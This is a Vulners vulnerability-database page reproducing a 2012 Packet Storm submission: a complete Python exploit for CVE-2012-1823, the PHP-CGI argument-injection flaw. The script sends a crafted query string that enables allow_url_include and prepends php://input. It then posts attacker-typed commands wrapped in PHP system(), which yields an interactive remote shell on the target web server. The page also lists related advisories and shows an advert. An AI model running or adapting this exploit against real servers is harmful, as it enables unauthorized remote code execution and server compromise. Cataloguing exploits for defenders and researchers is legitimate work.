Lucene search

K

PHP-CGI Argument Injection Remote Code Execution

πŸ—“οΈΒ 24 Dec 2012Β 00:00:00Reported byΒ infodoxTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 148Β Views

PHP-CGI Argument Injection Remote Code Execution python script to abuse PHP-CGI wrapper for remote code executio

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Apache + PHP 5.x Remote Code Execution Python Exploit #2
31 Oct 201300:00
–packetstorm
Packet Storm
PHP CGI Argument Injection
6 May 201200:00
–packetstorm
Packet Storm
Apache / PHP Remote Command Execution
29 Oct 201300:00
–packetstorm
Packet Storm
PHP CGI Injection
6 May 201200:00
–packetstorm
Packet Storm
PHP CGI Argument Injection
22 May 201200:00
–packetstorm
AttackerKB
CVE-2012-1823
11 May 201200:00
–attackerkb
AttackerKB
CVE-2013-4878
18 Jul 201300:00
–attackerkb
CISA KEV Catalog
PHP-CGI Query String Parameter Vulnerability
25 Mar 202200:00
–cisa_kev
CISA KEV Catalog
PHP-CGI OS Command Injection Vulnerability
12 Jun 202400:00
–cisa_kev
Exploit DB
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
29 Oct 201300:00
–exploitdb
Rows per page
`#!/usr/bin/python  
import requests  
import sys  
  
print """  
CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution  
This exploit abuses an arguement injection in the PHP-CGI wrapper  
to execute code as the PHP user/webserver user.  
Feel free to give me abuse about this <3  
- infodox | insecurety.net | @info_dox  
"""  
  
if len(sys.argv) != 2:  
print "Usage: ./cve-2012-1823.py <target>"  
sys.exit(0)  
  
target = sys.argv[1]  
url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""  
lol = """<?php system('"""  
lol2 = """');die(); ?>"""  
print "[+] Connecting and spawning a shell..."  
while True:  
try:  
bobcat = raw_input("%s:~$ " %(target))  
lulz = lol + bobcat + lol2  
hax = requests.post(url, lulz)  
print hax.text  
except KeyboardInterrupt:  
print "\n[-] Quitting"  
sys.exit(1)  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Dec 2012 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.957
148
.json
Report